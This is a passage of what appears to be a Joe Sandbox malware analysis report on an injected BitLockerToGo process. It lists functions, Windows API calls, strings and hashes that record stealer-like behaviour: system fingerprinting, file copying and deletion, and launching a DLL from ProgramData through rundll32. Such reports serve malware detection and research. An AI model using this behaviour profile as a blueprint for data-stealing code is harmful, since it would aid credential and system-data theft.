                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1859398019-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7bd2adef7b7e717fad959453394dab23ad27ebe6020d1c1f2fb9b91a9a8866c6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5dffedf690be7917e719092f3d26af60847267dd943b1b8c8ada567f80223961
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bd2adef7b7e717fad959453394dab23ad27ebe6020d1c1f2fb9b91a9a8866c6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56F0AF76BC126076E22416752C9EFAB2A6CAB42B66F204414F30CFA2C0DE61D8158664
                                                                                                                                                                                                                                                                                                                                                          Function 02A145AF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                          • ShellExecuteEx.SHELL32(?), ref: 02A147D6
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2215929589-2108736111
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2dbfc926a1741bf2e2cdc8a4160b4f3aac34c4f6cbd4aee2d50f8f29ad8595b8
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3f3ba93541b6c353c0ab74e64e03d6ace377c5a0d88939d7b681301f824a6390
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2dbfc926a1741bf2e2cdc8a4160b4f3aac34c4f6cbd4aee2d50f8f29ad8595b8
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E71D872D802299ADF11EBA5EE85BCDB7B6AF04314F114461EE14B7160DF31AF4A8F90
                                                                                                                                                                                                                                                                                                                                                          Function 02A17B46 Relevance: 8.9, APIs: 7, Instructions: 120stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A17BD5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A13A59
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A17BF2
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A17C11
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A17C25
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?), ref: 02A17C38
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A17C4C
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?), ref: 02A17C5F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A139EE: GetFileAttributesA.KERNEL32(?,?,?,02A0EA72,?,?,?), ref: 02A139F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 02A1787F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: RtlAllocateHeap.NTDLL(00000000), ref: 02A17886
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: wsprintfA.USER32 ref: 02A1789F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: FindFirstFileA.KERNEL32(?,?), ref: 02A178B6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: StrCmpCA.SHLWAPI(?,02A37AD8), ref: 02A178D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: StrCmpCA.SHLWAPI(?,02A37ADC), ref: 02A178F1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: wsprintfA.USER32 ref: 02A17918
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: CopyFileA.KERNEL32(?,?,00000001), ref: 02A179D5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1785A: DeleteFileA.KERNEL32(?), ref: 02A179F8
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$File$Heapwsprintf$AllocateAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3709078413-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8daa86d444eba2f1a3a81516fcf5565e55386175fb37bdc3b99079a1a0d3aef0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9a6a15c0d57a5001eb8d635a8de900ed3bdaeda7a6b4509da3ddafe454a564a3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8daa86d444eba2f1a3a81516fcf5565e55386175fb37bdc3b99079a1a0d3aef0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F51FAB5E4011C9BCB54DB64DC95ADDBBF9AB4C310F4048E6EB09E3250EA30AF998F54
                                                                                                                                                                                                                                                                                                                                                          Function 02A132E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A1332A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1421B: malloc.MSVCRT ref: 02A14220
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1421B: strncpy.MSVCRT ref: 02A14231
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A13352
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A37E68), ref: 02A1336F
                                                                                                                                                                                                                                                                                                                                                          • GetCurrentHwProfileA.ADVAPI32(?), ref: 02A132FB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2781187439-1654365787
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 885570d614381a96fc2af086539022a73e84ca40e97c00a7e35a361d0304008e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 78f1bfa81a958008688347ceab9f405879decc186edcfcd1cc33f3725ecfe49b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 885570d614381a96fc2af086539022a73e84ca40e97c00a7e35a361d0304008e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1112B71E80228ABDB11EB64DE85BD9B7B9AB04710F1004E1BA49E7150DE70AF888F54
                                                                                                                                                                                                                                                                                                                                                          Function 02A12D75 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,02A37950,Display Resolution: ,02A37934,00000000,User Name: ,02A37924,00000000,Computer Name: ,02A37910,AV: ,02A37904,Install Date: ), ref: 02A12D8D
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A12D94
                                                                                                                                                                                                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 02A12DB0
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A12DD6
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: %d MB
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2922868504-2651807785
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7afdc14d3b66060573a9a77f1ff62d90257130a574effd51985f9d8364917a04
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ec3c7941c408567ea3321d3c7c2018243543e6ea598f1e51a7d9f90d89522846
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7afdc14d3b66060573a9a77f1ff62d90257130a574effd51985f9d8364917a04
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB014FB5E40218ABEB14DFA4D946BBE77E8EF04311F44092AFD02E6140DA7499118A65
                                                                                                                                                                                                                                                                                                                                                          Function 02A049DE Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
                                                                                                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
                                                                                                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
                                                                                                                                                                                                                                                                                                                                                          • InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1274457161-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bd3d733947e55ca2b5f273b1b8ea2bbc8a4f58d1d8f0d035f3f6444152b3e4b7
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 973ca3243c95d96594516c983f542bf4fc255ff22c7d6ccffdca6b3a79eaa5cd
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd3d733947e55ca2b5f273b1b8ea2bbc8a4f58d1d8f0d035f3f6444152b3e4b7
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D011E35D00218ABCB149BA9DC45ADEBFB8AF55330F108616F925E72E0DB746601CF94
                                                                                                                                                                                                                                                                                                                                                          Function 02A12BAD Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000,Local Time: ,02A3796C), ref: 02A12BC1
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A12BC8
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A378C8,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000,Local Time: ), ref: 02A12BE6
                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(02A378C8,00000000,00000000,00000000,000000FF,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000), ref: 02A12C02
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(02A378C8,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000,Local Time: ,02A3796C,Keyboard Languages: ,02A37950), ref: 02A12C0B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3225020163-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 57b206ff0ff7f9b33a6759c5086919f1f78ffda7ac70b9720a0d7858720af63c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 15ed822aff78ae47885f39831119d882fa0e54ef43d17d28a295d21249fcb2ac
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57b206ff0ff7f9b33a6759c5086919f1f78ffda7ac70b9720a0d7858720af63c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6F0307DA80204BFEB105B91DC0FFAB7ABDEB44700F140624FF01A5180D7B05960DB51
                                                                                                                                                                                                                                                                                                                                                          Function 02A09622 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
